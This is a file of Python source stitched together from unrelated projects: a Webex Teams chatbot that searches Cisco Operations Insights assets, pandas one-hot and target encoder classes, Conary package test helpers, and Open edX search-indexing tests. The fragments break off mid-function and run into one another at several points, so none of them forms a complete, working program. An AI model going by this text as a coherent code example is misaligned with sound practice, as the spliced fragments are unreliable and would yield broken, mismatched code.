webhook_url="https://webexteamsmsg.herokuapp.com"
webhook_name="chatops"
botmail="<EMAIL>"
#########################################################
## FUNCTIONS
### WEBEX TEAMS
def CriaWebhook(webhook_name,webhook_url):
# Creates a webhook to receive messages via POST
# Tells Teams to generate hooks only for newly created messages
# Webhook for messages
api.webhooks.create(webhook_name,webhook_url,"messages","created")
# Webhook for a newly created room - welcome message
api.webhooks.create(webhook_name+"-new",webhook_url,"rooms","created")
return
def webexME():
# details about me (the bot)
data = api.people.me()
return data
def WebexRoomCreate(name):
# Creates a Webex room and returns the room ID; name here is the room name
api.rooms.create(name)
# Find the roomID of the room to return it
novasala = getwebexRoomID(name)
return novasala
def WebexRoomDel(id):
# Removes a Webex room; id here is the roomID
api.rooms.delete(id)
return
def WebexIncUser(sala,mail):
# Adds a user as a member of the room, creating the room if it does not exist
# Find the roomID of the room (sala is the full room name, or part of it)
salaaincluir=getwebexRoomID(sala)
# Create the room if it does not exist
if salaaincluir == None:
salaaincluir = WebexRoomCreate(sala)
useraincluir=getwebexUserID(mail)
# add the user if an id was found
if useraincluir !=None:
# perform the operation
api.memberships.create(salaaincluir,useraincluir)
return
def webexUser(mail):
# looks up the user ID and returns a message
usuario = api.people.list(email=mail)
user=None
for inter in usuario:
user = inter.id
if user !=None:
resultado = "Usuario "+str(mail)+" ID e' "+user
else:
resultado = "Nenhum Usuario encontrado para "+str(mail)
return resultado
def getwebexUserID(mail):
# looks up the user ID; returns None if not found
usuario = api.people.list(email=mail)
user=None
for x in usuario:
user = x.id
resultado = None
if user !=None:
resultado = user
return resultado
def webexRoomsList():
# lists the rooms I belong to
rooms=api.rooms.list()
resultado = ""
for room in rooms:
resultado = resultado + "Sala " + str(room.title) + " ID: " + str(room.id)+ "\n"
return resultado
def getwebexRoomID(sala):
# Returns the room ID; returns None if not found
# The sala parameter is all or part of the name of the room being searched for
# Rooms I belong to
rooms=api.rooms.list()
salawebex = None
# loop to find the ID of the requested room
for room in rooms:
if sala in room.title:
salawebex = room
break
# return the ID of the room if it was found
if salawebex != None:
resultado = (str(salawebex.id))
else:
resultado = salawebex
return resultado
def getwebexMsg(msgID):
# msgID is the parameter retrieved from the webhook body
# Returns a list with [0] the text of the given message, [1] the room ID and [2] the person's email
mensagem=api.messages.get(msgID)
return mensagem.text,mensagem.roomId,mensagem.personEmail
def webexmsgRoom(sala,msg):
# Sends a msg to a specific room, searching the rooms I am in (using part of the name given in sala)
rooms=api.rooms.list()
salawebex = None
salawebex = getwebexRoomID(sala)
# sending a message to the room if it was found:
if salawebex != None:
api.messages.create(salawebex,None,None,msg)
return
def webexmsgRoomviaID(sala,msg):
# Sends a msg to a specific room given as sala=roomID
api.messages.create(sala,None,None,msg)
return
def webexmsgAll(msg):
# message in every room I belong to
#
rooms=api.rooms.list()
for room in rooms:
api.messages.create(room.id,None,None,msg)
return
### OPERATIONS INSIGHTS
def OpiCategorySearch(textosearch):
# Searches Operations Insights for existing categories
# Part 1 - requests a token from OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = HTTP result (not used yet); conteudo is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resulting token
token='JWT ' + str(conteudo['token'])
# Part 2 - queries the categories using the token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/categories"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = HTTP result (not used yet); Jdata is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Loop that performs the search based on the device group in the data above
# Allows searching for everything when this keyword is used
if textosearch == "tudo":
textosearch = ""
resultado = ""
count = 0
for items in Jdata:
msg=""
if textosearch in str(items['department']['name']).lower() or textosearch in str(items['name']).lower():
# build the text output
msg=msg+str("Nome:"+str(items['name'])+". Departamento: "+str(items['department']['name'])+"\n")
count=count+1
resultado = resultado + msg
resultado = resultado + "\n"+str(count)+" Categorias Encontradas"
return resultado
def OpiAssetDetail(textosearch):
# Looks up the details of an asset
# Part 1 - requests a token from OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = HTTP result (not used yet); conteudo is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resulting token
token='JWT ' + str(conteudo['token'])
# Part 2 - queries assets using the token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/assets"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = HTTP result (not used yet); Jdata is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Loop that performs the search based on the device group in the data above
resultado=""
for items in Jdata:
msg=""
if textosearch in str(items['serial']).lower():
# If a match is found, build the response
msg=msg+str("Asset:"+str(items['serial'])+"\n")
msg=msg+str("Serial: "+str(items['tags'][0]['serial'])+"\n")
msg=msg+str("Tipo: "+str(items['tags'][0]['type'])+"\n")
msg=msg+str("Categoria: "+str(items['category']['name'])+"\n")
msg=msg+str("Local:"+str(items['site']['name'])+"\n")
msg=msg+str("Departamento:"+str(items['department']['name'])+"\n")
# Returns the zone identified by Insights, if it exists
try:
zona=str(items['location']['zones'][0]['name'])
msg=msg+str("Local: Sala "+str(zona)+"\n")
except:
pass
msg=msg+str("Local não encontrado\n")
resultado=resultado+str(msg)
if resultado=="":
resultado="Nenhum Asset encontrado"
return resultado
def OpiFindAssets(textosearch):
# Performs a search in Operations Insights
# Part 1 - requests a token from OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = HTTP result (not used yet); conteudo is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resulting token
token='JWT ' + str(conteudo['token'])
# Part 2 - queries assets using the token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/assets"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = HTTP result (not used yet); Jdata is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Loop that performs the search based on the device group in the data above
# Allows searching for everything when this keyword is used
if textosearch == "tudo":
textosearch = ""
resultado = ""
count = 0
for items in Jdata:
msg=""
if textosearch in str(items['tags'][0]['type']).lower() or textosearch in str(items['category']['name']).lower() or textosearch in str(items['serial']).lower():
count = count +1
# If found, build the response
msg=msg+str(str(count)+")Asset:"+str(items['serial'])+" Categoria: "+str(items['category']['name'])+" . ")
try:
zona=str(items['location']['zones'][0]['name'])
msg=msg+str("Local: Sala "+str(zona)+"\n")
except:
pass
msg=msg+str("Local não encontrado\n")
resultado = resultado + str(msg)
resultado = resultado + "\n"+str(count)+" Assets Encontrados"
return resultado
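# Minimal refactoring sketch (not part of the original bot): the three OPI functions
# above repeat the same two-step flow - fetch a JWT access token, then query an
# endpoint with it. A shared helper could look like the one below; the function name
# and the license_jwt argument are assumptions, and the caller must supply the
# 'JWT <license key>' string that the original code hard-codes.
def opi_get(endpoint, license_jwt):
    # Step 1 - exchange the license JWT for an access token
    url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
    headers = {'Content-type': "application/json", 'Authorization': license_jwt}
    token = 'JWT ' + str(json.loads(requests.request("GET", url, headers=headers).content)['token'])
    # Step 2 - call the requested entities endpoint with the access token
    url = "https://opinsights.cisco.com/api/am/v1/entities/access/" + endpoint
    headers = {'Content-type': "application/json", 'Authorization': token}
    return json.loads(requests.request("GET", url, headers=headers).content)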
def procura(textosearch):
# DEPRECATED - NO LONGER USED
# Performs a search in Operations Insights
# Part 1 - requests a token from OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = HTTP result (not used yet); conteudo is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resulting token
token='JWT ' + str(conteudo['token'])
# Part 2 - queries assets using the token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/assets"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = HTTP result (not used yet); Jdata is the actual content, converted to json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Loop that performs the search based on the device group in the data above
# Allows searching for everything when this keyword is used
#if textosearch == "tudo":
# textosearch = ""
# Searching for everything is not feasible because of the Webex Teams character limit DV
resultado = ""
msg=""
count = 0
for items in Jdata:
if textosearch in str(items['tags'][0]['type']) or textosearch in str(items['category']['name']):
# If found, build the response
msg=msg+str("----------------------------------------------------\n")
msg=msg+str("local:"+str(items['site']['name'])+"\n")
msg=msg+str("nome do asset:"+str(items['serial'])+"\n")
#msg=msg+str("localizacao x:"+str(items['location']['x'])+" y: "+str(items['location']['y'])+"\n")
msg=msg+str("estado: "+str(items['status'])+"\n")
msg=msg+str("serial: "+str(items['tags'][0]['serial'])+"\n")
msg=msg+str("tipo: "+str(items['tags'][0]['type'])+"\n")
msg=msg+str("categoria: "+str(items['category']['name'])+"\n")
count=count+1
resultado = resultado + str(msg)
resultado = resultado + "\n"+str(count)+" Assets Encontrados"
return resultado
def webextalk(msg_id):
# Interaction layer for the user talking to the BOT
# call the function to retrieve the message details (via id)
dados = getwebexMsg(msg_id)
# store the text of the msg sent by the user
# box is what the user typed
box=dados[0]
# store the id of the room it came from, so we can reply to the same room
idsala=dados[1]
# store the sender's email - not used yet
usermail=dados[2]
# Fallback in case no request handled here matches
msg="Nao entendi seu pedido"
# Split to extract the parameter details
sp=box.split(" ")
box=sp[0]
# convert to lowercase
box=box.lower()
# dispatch according to the parameters
if box == "ajuda" or box =="help":
msg="Chatops Teams 1.0\nComandos disponiveis:\nhelp: esta ajuda\nProcura <nome ou tudo>: Procurar local do Asset\nCategorias <nome ou tudo>: Lista Categorias cadastradas no OPI como nome identificado\nAsset <nome do asset>:apresenta detalhes do Asset\n"
msg=msg+str("userid <email>: Identifica ID do usuario\nroomid <nome da sala>: Identifica ID da sala\nsalas: lista salas que pertenco\n")
# call the OPI search function only if there are 2 parameters
if box == "procura" and len(sp)>1:
asset=sp[1]
msg = OpiFindAssets(asset)
# call the OPI search function only if there are 2 parameters
if box == "categorias" and len(sp)>1:
categoria=sp[1]
msg = OpiCategorySearch(categoria)
# call the OPI search function only if there are 2 parameters
if box == "asset" and len(sp)>1:
asset=sp[1]
msg = OpiAssetDetail(asset)
# call the function if there are at least 2 parameters
if box == "userid" and len(sp)>1:
email=sp[1]
msg = str("ID da user: " +str(email)+": "+str(getwebexUserID(email)))
# call the function if there are at least 2 parameters
if box == "roomid" and len(sp)>1:
sala=sp[1]
msg = str("ID da sala: " +str(sala)+": "+str(getwebexRoomID(sala)))
when a column is not in dataframe
"""
# Check types
if cols is not None and not isinstance(cols, (list, str)):
raise TypeError('cols must be None, or a list or a string')
if isinstance(cols, list):
if not all(isinstance(c, str) for c in cols):
raise TypeError('each element of cols must be a string')
if not isinstance(reduce_df, bool):
raise TypeError('reduce_df must be True or False')
if not isinstance(dtype, str):
raise TypeError('dtype must be a string (e.g. \'uint8\')')
if nocol is not None and nocol not in ('warn', 'err'):
raise ValueError('nocol must be None, \'warn\', or \'err\'')
# Store parameters
if isinstance(cols, str):
self.cols = [cols]
else:
self.cols = cols
self.reduce_df = reduce_df
self.dtype = dtype
self.nocol = nocol
def fit(self, X, y):
"""Fit one-hot encoder to X and y
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
OneHotEncoder
Returns self, the fit object.
"""
# Encode all categorical cols by default
if self.cols is None:
self.cols = [c for c in X
if str(X[c].dtype)=='object']
# Check columns are in X
if self.nocol == 'err':
for col in self.cols:
if col not in X:
raise ValueError('Column \''+col+'\' not in X')
elif self.nocol == 'warn':
for col in self.cols:
if col not in X:
print('Column \''+col+'\' not in X')
# Store each unique value
self.maps = dict()
for col in self.cols:
self.maps[col] = []
uniques = X[col].unique()
for unique in uniques:
self.maps[col].append(unique)
# Remove last degree of freedom
if self.reduce_df:
for col in self.cols:
del self.maps[col][-1]
# Return fit object
return self
def transform(self, X, y=None):
"""Perform the one-hot encoding transformation.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
Xo = X.copy()
for col, vals in self.maps.items():
for val in vals:
new_col = col+'_'+str(val)
Xo[new_col] = (Xo[col]==val).astype(self.dtype)
del Xo[col]
return Xo
def fit_transform(self, X, y=None):
"""Fit and transform the data with one-hot encoding.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
return self.fit(X, y).transform(X, y)
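# Illustrative usage sketch (not part of the original module). It is wrapped in a
# function so nothing runs at import time; the column names and data are made up,
# and all constructor arguments are passed explicitly since their defaults are not
# shown here.
def _demo_one_hot_encoder():
    import pandas as pd
    X = pd.DataFrame({'color': ['red', 'blue', 'red'], 'size': [1.0, 2.0, 3.0]})
    y = pd.Series([10.0, 20.0, 30.0])
    enc = OneHotEncoder(cols='color', reduce_df=False, dtype='uint8', nocol=None)
    # Returns a copy of X where 'color' is replaced by color_red / color_blue indicators
    return enc.fit_transform(X, y)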
class TargetEncoder(BaseEstimator, TransformerMixin):
"""Target encoder.
Replaces category values in categorical column(s) with the mean target
(dependent variable) value for each category.
"""
def __init__(self, cols=None, dtype='float64', nocol=None):
"""Target encoder.
Parameters
----------
cols : str or list of str
Column(s) to target encode. Default is to target encode all
categorical columns in the DataFrame.
dtype : str
Datatype to use for encoded columns. Default = 'float64'
nocol : None or str
Action to take if a col in ``cols`` is not in the dataframe to
transform. Valid values:
* None - ignore cols in ``cols`` which are not in dataframe
* 'warn' - issue a warning when a column is not in dataframe
* 'err' - raise an error when a column is not in dataframe
"""
# Check types
if cols is not None and not isinstance(cols, (list, str)):
raise TypeError('cols must be None, or a list or a string')
if isinstance(cols, list):
if not all(isinstance(c, str) for c in cols):
raise TypeError('each element of cols must be a string')
if not isinstance(dtype, str):
raise TypeError('dtype must be a string (e.g. \'uint8\')')
if nocol is not None and nocol not in ('warn', 'err'):
raise ValueError('nocol must be None, \'warn\', or \'err\'')
# Store parameters
if isinstance(cols, str):
self.cols = [cols]
else:
self.cols = cols
self.dtype = dtype
self.nocol = nocol
def fit(self, X, y):
"""Fit target encoder to X and y.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
TargetEncoder
Returns self, the fit object.
"""
# Encode all categorical cols by default
if self.cols is None:
self.cols = [col for col in X if str(X[col].dtype)=='object']
# Check columns are in X
if self.nocol == 'err':
for col in self.cols:
if col not in X:
raise ValueError('Column \''+col+'\' not in X')
elif self.nocol == 'warn':
for col in self.cols:
if col not in X:
print('Column \''+col+'\' not in X')
# Encode each element of each column
self.maps = dict()
for col in self.cols:
if col in X:
tmap = dict()
uniques = X[col].unique()
for unique in uniques:
tmap[unique] = y[X[col]==unique].mean()
self.maps[col] = tmap
# Return fit object
return self
def transform(self, X, y=None):
"""Perform the target encoding transformation.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
Xo = X.copy()
for col, tmap in self.maps.items():
vals = np.full(X.shape[0], np.nan, dtype=self.dtype)
for val, mean_target in tmap.items():
vals[X[col]==val] = mean_target
Xo[col] = vals
return Xo
def fit_transform(self, X, y=None):
"""Fit and transform the data with target encoding.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
return self.fit(X, y).transform(X, y)
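# Illustrative usage sketch (not part of the original module); the column name and
# data values are made up, and the helper is only defined, never run at import time.
def _demo_target_encoder():
    import pandas as pd
    X = pd.DataFrame({'city': ['a', 'b', 'a', 'b']})
    y = pd.Series([1.0, 2.0, 3.0, 4.0])
    enc = TargetEncoder(cols='city')
    # 'a' is replaced by mean(1.0, 3.0) = 2.0 and 'b' by mean(2.0, 4.0) = 3.0
    return enc.fit_transform(X, y)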
class TargetEncoderCV(BaseEstimator, TransformerMixin):
"""Cross-fold target encoder.
Replaces category values in categorical column(s) with the mean target
(dependent variable) value for each category, using a cross-fold strategy
such that no sample's target value is used in computing the target mean
which is used to replace that sample's category value.
"""
def __init__(self, cols=None, n_splits=3, shuffle=True, dtype='float64',
nocol=None):
"""Cross-fold target encoder.
Parameters
----------
cols : str or list of str
Column(s) to target encode. Default is to target encode all
categorical columns in the DataFrame.
n_splits : int
Number of cross-fold splits. Default = 3.
shuffle : bool
Whether to shuffle the data when splitting into folds.
dtype : str
Datatype to use for encoded columns. Default = 'float64'
nocol : None or str
Action to take if a col in ``cols`` is not in the dataframe to
transform. Valid values:
* None - ignore cols in ``cols`` which are not in dataframe
* 'warn' - issue a warning when a column is not in dataframe
* 'err' - raise an error when a column is not in dataframe
"""
# Check types
if cols is not None and not isinstance(cols, (list, str)):
raise TypeError('cols must be None, or a list or a string')
if isinstance(cols, list):
if not all(isinstance(c, str) for c in cols):
raise TypeError('each element of cols must be a string')
if not isinstance(n_splits, int):
raise TypeError('n_splits must be an integer')
if n_splits < 1:
raise ValueError('n_splits must be positive')
if not isinstance(shuffle, bool):
raise TypeError('shuffle must be True or False')
if not isinstance(dtype, str):
raise TypeError('dtype must be a string (e.g. \'float64\')')
if nocol is not None and nocol not in ('warn', 'err'):
raise ValueError('nocol must be None, \'warn\', or \'err\'')
# Store parameters
if isinstance(cols, str):
self.cols = [cols]
else:
self.cols = cols
self.n_splits = n_splits
self.shuffle = shuffle
self.dtype = dtype
self.nocol = nocol
def fit(self, X, y):
"""Fit cross-fold target encoder to X and y.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
TargetEncoderCV
Returns self, the fit object.
"""
self._target_encoder = TargetEncoder(cols=self.cols, nocol=self.nocol)
self._target_encoder.fit(X, y)
return self
def transform(self, X, y=None):
"""Perform the target encoding transformation.
Uses cross-fold target encoding when given training data, and uses
| |
= '/contents%s' % filePrimer
contents = 'hello, world!\n'
if not filePrimer:
filePrimer = '\0'
filePrimer = str(filePrimer)
# Pad it on the left with zeros, up to 16 chars long
pathId = filePrimer.rjust(16, '\1')
pathId = pathId[0:16]
contents = RegularFile(contents = contents, pathId = pathId,
config = None)
fileContents = [(path, contents)]
index = 0
for fileInfo in fileContents:
fileReq = None
fileProv = None
fileFlavor = None
if isinstance(fileInfo, str):
fileInfo = [fileInfo, 'foo']
fileName, contents = fileInfo[0:2]
if isinstance(contents, filetypes._File):
assert(len(fileInfo) == 2)
else:
if len(fileInfo) > 3:
if isinstance(fileInfo[3], (list, tuple)):
fileReq = fileInfo[3][0]
fileProv = fileInfo[3][1]
else:
fileReq = fileInfo[3]
if len(fileInfo) > 2 and fileInfo[2] is not None:
fileVersion = self._cvtVersion(fileInfo[2])
else:
fileVersion = troveVersion
contents = RegularFile(requires = fileReq,
provides = fileProv,
contents = contents)
contents.version = fileVersion
cont = componentDir + '/' + fileName
dir = os.path.dirname(cont)
if not os.path.exists(dir):
util.mkdirChain(dir)
pathId = contents.pathId
if pathId is None:
pathId = sha1helper.md5String(pathIdSalt + fileName)
else:
pathId += '0' * (16 - len(pathId))
f = contents.get(pathId)
f.flags.isSource(isSource)
if contents.config is not None:
f.flags.isConfig(contents.config)
elif ((setConfigFlags and fileName.startswith('/etc'))
or troveName.endswith(':source')):
f.flags.isConfig(True)
index += 1
if capsule and not (f.flags.isConfig() or
getattr(contents, 'isGhost', None)):
# RBL-5684: we force ghost files to not be marked as
# payload
f.flags.isEncapsulatedContent(True)
if contents.version:
fileVersion = self._cvtVersion(contents.version)
elif (versus and versus.hasFile(pathId) and
versus.getFile(pathId)[1] == f.fileId()):
# reuse file version if it hasn't changed
fileVersion = versus.getFile(pathId)[2]
else:
fileVersion = troveVersion
if not troveName.endswith(':source'):
if fileName[0] != '/':
fileName = '/' + fileName
assert(len(pathId) == 16)
t.addFile(pathId, fileName, fileVersion, f.fileId())
if hasattr(contents, 'contents'):
fileList.append((f, pathId, contents.contents))
else:
fileList.append((f, pathId, None))
# find the flavor for this trove; it depends on the flavors of the
# files
for f, pathId, contents in fileList:
flavor.union(f.flavor())
t.changeFlavor(flavor)
# create an absolute changeset
cs = changeset.ChangeSet()
if existsOkay and repos.hasTrove(troveName, troveVersion, flavor):
return repos.getTrove(troveName, troveVersion, flavor), None
if factory is not None:
t.setFactory(factory)
if not redirect:
if isinstance(requires, str):
req = deps.parseDep(requires)
else:
req = requires.copy()
if isinstance(provides, str):
prov = deps.parseDep(provides)
else:
prov = provides.copy()
prov.union(deps.parseDep('trove: %s' % t.getName()))
for f, pathId, contents in fileList:
req.union(f.requires())
prov.union(f.provides())
t.setRequires(req)
t.setProvides(prov)
if not troveName.endswith(':source'):
if not sourceName:
sourceName = troveName.split(":")[0] + ":source"
t.setSourceName(sourceName)
t.computePathHashes()
t.setBuildTime(buildTime)
if redirect:
for toName, toBranch, toFlavor in redirectList:
t.addRedirect(toName, toBranch, toFlavor)
size = 0
# add the file and file contents
for f, pathId, contents in fileList:
cs.addFile(None, f.fileId(), f.freeze())
if f.hasContents and not f.flags.isEncapsulatedContent():
cs.addFileContents(pathId, f.fileId(),
changeset.ChangedFileTypes.file, contents,
f.flags.isConfig())
size += f.contents.size()
if metadata:
if not isinstance(metadata, (tuple, list)):
metadata = [metadata]
for item in metadata:
t.troveInfo.metadata.addItem(item)
t.setSize(size)
t.computeDigests()
diff = t.diff(None, absolute = True)[0]
cs.newTrove(diff)
cs.setPrimaryTroveList([t.getNameVersionFlavor()])
return t, cs
addQuickTestComponent = addComponent
def addDbComponent(self, db, name, version='1', flavor='',
provides=deps.DependencySet(),
requires=deps.DependencySet()):
fileList = []
# create a file
cont = self.workDir + '/contents'
f = open(cont, 'w')
f.write('hello, world!\n')
f.close()
pathId = sha1helper.md5FromString('0' * 32)
f = files.FileFromFilesystem(cont, pathId)
fileList.append((f, cont, pathId))
v = self._cvtVersion(version)
flavor = deps.parseFlavor(flavor)
t = trove.Trove(name, v, flavor, None)
for f, name, pathId in fileList:
t.addFile(pathId, '/' + name, v, f.fileId())
t.setRequires(requires)
t.setProvides(provides)
info = db.addTrove(t)
db.addTroveDone(info)
db.commit()
return t
addQuickDbTestPkg = addDbComponent
def addRPMComponent(self, nameSpec, rpmPath, versus = None,
fileContents=None, requires=deps.DependencySet()):
if rpmPath[0] != '/':
rpmPath = resources.get_archive(rpmPath)
f = open(rpmPath, "r")
h = rpmhelper.readHeader(f)
expandDir = self.workDir + '/rpm'
if os.path.exists(expandDir):
shutil.rmtree(expandDir)
os.mkdir(expandDir)
p = os.popen("cd %s; cpio --quiet -iumd" % (expandDir, ), "w")
rpmhelper.extractRpmPayload(f, p)
p.close()
f.close()
fl = []
for path, mode, flags, linksTo, fileColor, rdev in itertools.izip(
h[rpmhelper.OLDFILENAMES],
h[rpmhelper.FILEMODES], h[rpmhelper.FILEFLAGS],
h[rpmhelper.FILELINKTOS],
h[rpmhelper.FILECOLORS],
h[rpmhelper.FILERDEVS]):
if stat.S_ISDIR(mode):
fl.append((path, Directory()))
elif stat.S_ISBLK(mode) or stat.S_ISCHR(mode):
minor = rdev & 0xff | (rdev >> 12) & 0xffffff00
major = (rdev >> 8) & 0xfff
if stat.S_ISBLK(mode):
fl.append((path, BlockDevice(major, minor)))
elif stat.S_ISCHR(mode):
fl.append((path, CharacterDevice(major, minor)))
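# Worked example of the rdev decoding above (illustrative): rdev = 0x0803 gives
# minor = 0x0803 & 0xff | (0x0803 >> 12) & 0xffffff00 = 3 and
# major = (0x0803 >> 8) & 0xfff = 8, i.e. Linux device number 8:3.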
else:
isConfig = ((flags & rpmhelper.RPMFILE_CONFIG) != 0)
isGhost = ((flags & rpmhelper.RPMFILE_GHOST) != 0)
# You can't have symlinks that are initialContents
if stat.S_ISLNK(mode):
fobj = Symlink(linksTo)
else:
if isGhost:
contents = ''
# can't have files which are both initialContents
# and config
isConfig = False
else:
contents = open(expandDir + path)
if fileColor == 2:
req = 'abi: ELF64(SysV x86_64)'
elif fileColor == 1:
req = 'abi: ELF32(SysV x86)'
else:
req = None
fobj = RegularFile(contents = contents,
config = isConfig,
initialContents = isGhost,
requires = req)
if isGhost:
# RBL-5684: we force ghost files to not be marked as
# payload (see Component)
fobj.isGhost = True
fl.append((path, fobj))
fl.extend(fileContents or [])
return self.addComponent(nameSpec, fileContents = fl,
capsule = rpmPath, versus = versus,
requires=requires)
def addTestPkg(self, num, requires=[], fail=False, content='',
flags=[], localflags=[], packageSpecs=[], subPackages=[],
version='1.0', branch=None,
header='', fileContents='',
tag=None, binary=False):
""" This method is a wrapper around the recipes.py createRecipe
method. It creates the recipe with the given characteristics,
and then commits it to the repository.
num = recipe name is 'test%(num)s
requires = other packages added to the buildRequires of
this package
fail - if true, an exit(1) is added
fileContents - contents of the text file in the package
content - place to add content to the recipe setup() function
header - place to add content to the recipe before setup()
branch - place this source component on a branch
localFlags - check Flags.foo for this recipe for every foo passed in
flags - check use.[Arch,Use].foo, for every [Arch,Use].foo passed in
"""
origDir = os.getcwd()
os.chdir(self.workDir)
pkgname = 'test%d' % num
if not 'packages' in self.__dict__:
self.packages = {}
if num in self.packages:
self.checkout(pkgname, branch)
else:
self.newpkg(pkgname)
os.chdir(pkgname)
if not isinstance(subPackages, (tuple, list)):
subPackages = [subPackages]
if not isinstance(packageSpecs, (tuple, list)):
packageSpecs = [packageSpecs]
fileContents = recipes.createRecipe(num, requires, fail, content,
packageSpecs, subPackages, version=version, flags=flags,
localflags=localflags, header=header, fileContents=fileContents,
tag=tag, binary=binary)
self.writeFile(pkgname + '.recipe', fileContents)
if num not in self.packages:
self.addfile(pkgname + '.recipe')
self.commit()
os.chdir('..')
shutil.rmtree(pkgname)
os.chdir(origDir)
self.packages[num] = pkgname
return fileContents
def cookTestPkg(self, num, logLevel=log.WARNING, macros={}, prep=False):
stdout = os.dup(sys.stdout.fileno())
stderr = os.dup(sys.stderr.fileno())
null = os.open('/dev/null', os.O_WRONLY)
os.dup2(null, sys.stdout.fileno())
os.dup2(null, sys.stderr.fileno())
try:
return cook.cookItem(self.repos, self.cfg, 'test%s' % num, macros=macros, prep=prep)
finally:
os.dup2(stdout, sys.stdout.fileno())
os.dup2(stderr, sys.stderr.fileno())
os.close(null)
os.close(stdout)
os.close(stderr)
def createMetadataItem(self, **kw):
mi = trove.MetadataItem()
for key, value in kw.items():
if isinstance(value, (list, tuple)):
for val in value:
getattr(mi, key).set(val)
elif isinstance(value, dict):
getattr(mi, key).update(value)
else:
getattr(mi, key).set(value)
return mi
def cookFromRepository(self, troveName, buildLabel = None, ignoreDeps = False, repos = None, logBuild = False, callback = None):
if buildLabel:
oldLabel = self.cfg.buildLabel
self.cfg.buildLabel = buildLabel
if not repos:
repos = self.openRepository()
built = self.discardOutput( cook.cookItem, repos, self.cfg, troveName,
ignoreDeps = ignoreDeps, logBuild = logBuild,
callback = callback )
if buildLabel:
self.cfg.buildLabel = oldLabel
return built[0]
def verifyFifo(self, file):
return stat.S_ISFIFO(os.lstat(file).st_mode)
def verifyFile(self, path, contents=None, perms=None):
f = open(path, "r")
other = f.read()
if contents is not None:
if other != contents:
self.fail("contents incorrect for %s" % path)
assert(other == contents)
if perms is not None:
assert(os.stat(path)[stat.ST_MODE] & 0777 == perms)
def verifyNoFile(self, file):
try:
f = open(file, "r")
except IOError, err:
if err.errno == 2:
return
else:
self.fail("verifyNoFile returned unexpected error code: %d" % err.errno)
else:
self.fail("file exists: %s" % file)
def verifySrcDirectory(self, contents, dir = "."):
self.verifyDirectory(contents + [ "CONARY" ], dir)
def verifyDirectory(self, contents, dir = "."):
self.verifyFileList(contents, os.listdir(dir))
def verifyPackageFileList(self, pkg, ideal):
list = [ x[1] for x in pkg.iterFileList() ]
self.verifyFileList(ideal, list)
def verifyTroves(self, pkg, ideal):
actual = [ (x[0], x[1].asString(), x[2]) \
for x in pkg.iterTroveList(strongRefs=True) ]
if sorted(actual) != sorted(ideal):
self.fail("troves don't match expected: got %s expected %s"
%(actual, ideal))
def verifyFileList(self, ideal, actual):
dict = {}
for n in ideal: dict[n] = 1
for n in actual:
if dict.has_key(n):
del dict[n]
else:
self.fail("unexpected file %s" % n)
if dict:
self.fail("files missing %s" % " ".join(dict.keys()))
assert(not dict)
def verifyInstalledFileList(self, dir, list):
paths = {}
for path in list:
paths[path] = | |
SearchIndexingError """
self.publish_item(store, self.vertical.location)
with self.assertRaises(SearchIndexingError):
self.reindex_course(store)
@ddt.data(*WORKS_WITH_STORES)
def test_indexing_course(self, store_type):
self._perform_test_using_store(store_type, self._test_indexing_course)
@ddt.data(*WORKS_WITH_STORES)
def test_not_indexing_unpublished_content(self, store_type):
self._perform_test_using_store(store_type, self._test_not_indexing_unpublished_content)
@ddt.data(*WORKS_WITH_STORES)
def test_deleting_item(self, store_type):
self._perform_test_using_store(store_type, self._test_deleting_item)
@ddt.data(*WORKS_WITH_STORES)
def test_start_date_propagation(self, store_type):
self._perform_test_using_store(store_type, self._test_start_date_propagation)
@ddt.data(*WORKS_WITH_STORES)
def test_search_disabled(self, store_type):
